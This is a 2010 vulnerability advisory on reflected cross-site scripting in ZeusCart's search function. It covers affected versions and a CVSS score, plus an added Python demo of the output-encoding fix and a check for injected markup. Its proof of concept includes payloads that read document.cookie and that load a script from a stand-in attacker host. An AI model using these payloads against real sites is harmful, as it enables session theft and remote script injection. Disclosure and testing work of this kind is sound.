ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability

Published: 2010-08-08 (securityvulns SECURITYVULNS:DOC:24424, via vulners.com)

#######################################################################
ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability

SecPod Technologies (www.secpod.com)
Author: Sooraj K.S
#######################################################################

SecPod ID: 1003

07/28/2010 Issue Discovered
07/30/2010 Vendor Notified
No Response from Vendor

Class: Cross-Site Scripting
Severity: Medium

Overview:

ZeusCart Ecommerce Shopping Cart Software is prone to a reflected cross-site
scripting vulnerability in its search function.

Technical Description:

ZeusCart Ecommerce Shopping Cart Software is prone to a reflected cross-site
scripting vulnerability because it fails to properly sanitize user-supplied
input.

Input passed via the 'search' parameter of the 'search' action in index.php is
not HTML-encoded before it is echoed back in the response. An attacker who
lures a victim into following a crafted link, or into submitting a crafted
search, can execute arbitrary HTML and script code in the victim's browser
session in the context of the vulnerable site. This may allow the attacker to
steal cookie-based authentication credentials (session cookies) and to launch
other attacks.

The vulnerability has been tested in ZeusCart 3.0 and 2.3. Other versions may
also be affected.

Impact:

Successful exploitation allows an attacker to execute arbitrary HTML and script
code in a user's browser session in the context of a vulnerable site.

Affected Software:

ZeusCart 3.0
ZeusCart 2.3

Tested on:
ZeusCart 3.0 and 2.3 (tested using the Microsoft Internet Explorer browser)

Reference:

http://www.zeuscart.com/
http://secpod.org/blog/?p=109
http://secpod.org/advisories/SECPOD_ZeusCart_XSS.txt

Proof of Concept:

1) Enter the following string in the search box and click search:
'"%22%20style=x:expression(alert(document.cookie))><"
This payload relies on the CSS expression() dynamic property, which only
Microsoft Internet Explorer evaluates; it triggered in Internet Explorer when
tested against ZeusCart 3.0 and 2.3.

2) The following request worked against ZeusCart 2.3 (REMOTE_SITE_SCRIPT stands
for an attacker-controlled script URL):
http://www.example.com/?do=search&search='"><SCRIPT SRC=//REMOTE_SITE_SCRIPT>
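As an added illustration of the reflection described in the technical
description and of how a tester verifies the proof of concept (this is example
code added by the editor, not ZeusCart's source), the Python below simulates a
search results page that echoes the 'search' parameter both into a quoted
attribute value and into page text, once without encoding and once with
HTML encoding, then parses each result the way a browser would to see whether
the two payloads above introduce new tags or attributes. The HTML template, the
render functions and the benign term "shoes" are hypothetical; the example
assumes the parameter is URL-decoded exactly once before use, as PHP's $_GET
does for a query string, which the advisory does not state for ZeusCart.

```python
"""Added example: reflected XSS in a search echo, the output-encoding fix,
and a structural check that tells a real injection from a harmless echo.
Not ZeusCart code; the template and render functions are hypothetical."""
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Payloads taken from the advisory's proof of concept, as typed / requested.
IE_EXPRESSION_PAYLOAD = "'\"%22%20style=x:expression(alert(document.cookie))><\""
SCRIPT_SRC_PAYLOAD = "'\"><SCRIPT SRC=//REMOTE_SITE_SCRIPT>"

# Constructed stand-in for a search results page: the 'search' term is
# reflected inside a double-quoted attribute value and in body text.
TEMPLATE = (
    "<html><body>"
    '<form action="index.php"><input type="hidden" name="do" value="search">'
    '<input type="text" name="search" value="{term}"></form>'
    "<p>Results for {term}</p>"
    "</body></html>"
)


def server_sees(raw_param: str) -> str:
    """Assumption: the parameter is URL-decoded once before use, as PHP's
    $_GET does for a query string ('%22%20' becomes '" ')."""
    return unquote(raw_param)


def render_vulnerable(term: str) -> str:
    """The bug: the term is echoed with no output encoding at all."""
    return TEMPLATE.format(term=term)


def render_fixed(term: str) -> str:
    """The fix: HTML-encode for the output context. quote=True also turns
    ' and " into entities, which is essential because the term lands inside
    a double-quoted attribute (htmlspecialchars($s, ENT_QUOTES) in PHP)."""
    return TEMPLATE.format(term=html.escape(term, quote=True))


class _MarkupCollector(HTMLParser):
    """Records every tag and every tag@attribute the parser encounters."""

    def __init__(self) -> None:
        super().__init__()
        self.units: set[str] = set()

    def handle_starttag(self, tag, attrs):
        self.units.add(tag)
        for name, _value in attrs:
            self.units.add(f"{tag}@{name}")


def markup_units(page: str) -> set[str]:
    collector = _MarkupCollector()
    collector.feed(page)
    collector.close()
    return collector.units


def injected_markup(render, payload: str, benign: str = "shoes") -> list[str]:
    """Tags/attributes present when 'payload' is reflected but absent when a
    benign term is. A plain substring search for the payload would also match
    an encoded (harmless) echo; this diff flags only changes to the document
    structure, which is what an XSS payload needs. Empty list = not injected."""
    return sorted(markup_units(render(payload)) - markup_units(render(benign)))


if __name__ == "__main__":
    for label, payload in (("IE expression()", IE_EXPRESSION_PAYLOAD),
                           ("script src", SCRIPT_SRC_PAYLOAD)):
        term = server_sees(payload)
        print(f"{label}: vulnerable -> {injected_markup(render_vulnerable, term)}")
        print(f"{label}: fixed      -> {injected_markup(render_fixed, term)}")
```

Against the vulnerable renderer the second payload produces a new script
element with a src attribute, and the first produces a new style attribute on
the input element (the browser-side parser, like Internet Explorer, closes the
value attribute at the injected quote and reads what follows as further
attributes); against the encoded renderer neither payload changes the
structure, which is the check to repeat after a vendor fix ships.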

Solution:

Fix not available

Risk Factor:

CVSS Score Report: 
    ACCESS_VECTOR          = NETWORK
    ACCESS_COMPLEXITY      = MEDIUM
    AUTHENTICATION         = NONE
    CONFIDENTIALITY_IMPACT = NONE
    INTEGRITY_IMPACT       = PARTIAL
    AVAILABILITY_IMPACT    = NONE
    EXPLOITABILITY         = PROOF_OF_CONCEPT
    REMEDIATION_LEVEL      = UNAVAILABLE
    REPORT_CONFIDENCE      = CONFIRMED
    CVSS Base Score        = 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)

Credits:

Sooraj K.S of SecPod Technologies has been credited with the discovery of this
vulnerability.